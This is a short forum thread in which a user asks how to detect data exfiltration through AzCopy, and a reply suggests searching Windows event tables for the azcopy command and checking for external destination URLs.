Forum Discussion
Dean_Gross
Jun 19, 2021Silver Contributor
Methods for Detecting Exfiltration using AZcopy
What are the best ways to monitor for this type of event Exfiltrating data by transfering it to the cloud with Azcopy – Microsoft 365 Security (m365internals.com) ?
- GaryBusheyBronze Contributor
Dean_Gross I haven't' actually tried this but I would think you could search the Event and SecurityEvent tables for the azcopy command and then filter based on the file you are looking for. Of course, a smart person would rename the file before trying to upload it so you may want to see if the URL it is sending the data to is external to your company.
Take a look at this blog post to give you an idea on how to do this: Monitor and Hunting P0w3rSh3LL with Azure Sentinel (eshlomo.us)